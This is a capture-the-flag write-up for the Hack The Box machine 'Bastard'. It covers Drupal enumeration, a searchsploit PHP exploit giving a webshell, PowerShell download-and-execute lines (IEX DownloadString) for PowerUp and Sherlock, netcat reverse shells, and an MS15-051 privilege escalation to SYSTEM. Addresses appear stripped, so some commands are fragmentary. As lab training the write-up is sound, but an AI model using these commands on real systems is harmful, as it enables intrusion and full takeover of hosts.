Hack The Box: Bastard

Difficulty: Medium Machine Creator: ch4p Tools Used:

NMAP Droopescan Searchsploit PHP Burp Suite Remote Code Execution Powershell Empire: Powerup.ps1 Sherlock Netcat

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC

HTTP – Drupal


For Drupal we can use a tool called droopescan. We can install using python pip installer.

Apt-get install python-pip pip install droopsescan

Now we can run droopescan against the remote server. This will take a while to finish.

droopescan scan drupal -u


We know this is a drupal7 server lets use searchsploit to see if there are any vulnerabilities that we may be able to use.

searchsploit drupal

Lets copy the exploit to our working directory.

cp /usr/share/exploitdb/exploits/php/webapps/41564.php .

We need to manually edit this exploit which is written in PHP. First install php-curl

apt-get install php-curl

Burp Suite

Let’s setup port forwarding. We will direct everything pointing to localhost:1337 to

Now setup the request handling.

Now we need to update our exploit to route through the proxy.

Exploit Execution

Remote Code Execution

Powershell Empire

We can find vulnerabilities using powerup from powershell empire. Let’s download Powershell Empire.

git clone https://github.com/EmpireProject/Empire.git

Now that we have PSE downloaded lets copy the PowerUp.ps1 so we can edit it.

cp Empire/data/module_source/privesc/PowerUp.ps1 .

Now we need to pull the PowerUp.ps1 from our web server and execute on the remote machine.

In the webshell we can add this command. IEX(New-Object Net.WebClient).DownloadString(‘’) | powershell -noprofile –

Looking at the results we can see access denied which tells us that we don’t have admin rights.

Going through the results there is nothing that can help us elevate our permissions.


Let’s try finding a vulnerability using sherlock.ps1

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1

We can copy and execute sherlock the same way that we did powerup. IEX(New-Object Net.WebClient).DownloadString(‘’) | powershell -noprofile –

Reverse Shell Netcat

Before we do our privledge elevation we need a remote shell we can do this with netcat x64 verison.

wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip

Unzip the netcat files so we can upload and run them.

Setup our netcat listener.

nc -lvnp 8081

Make sure the python simplehttp server is running

Python -m SimpleHTTPserver

Enter the follow url in the browser to upload netcat x64 and create a reverse shell. -e cmd 8081

Privledge Eseclation


MS15-051 exploit×64.exe&fexec=ms15-051×64.exe whoami

Privledge Netcat

Similiar to the previous netcat we did were going to execute the existing nc file and create a 2nd reverse shell running as system.

nc -lvnp 8082×64.exe&fexec=ms15-051×64.exe “nc -e 8082”

User.txt and Root.txt

#Drupal #hackthebox #RCE #RemoteCodeExecution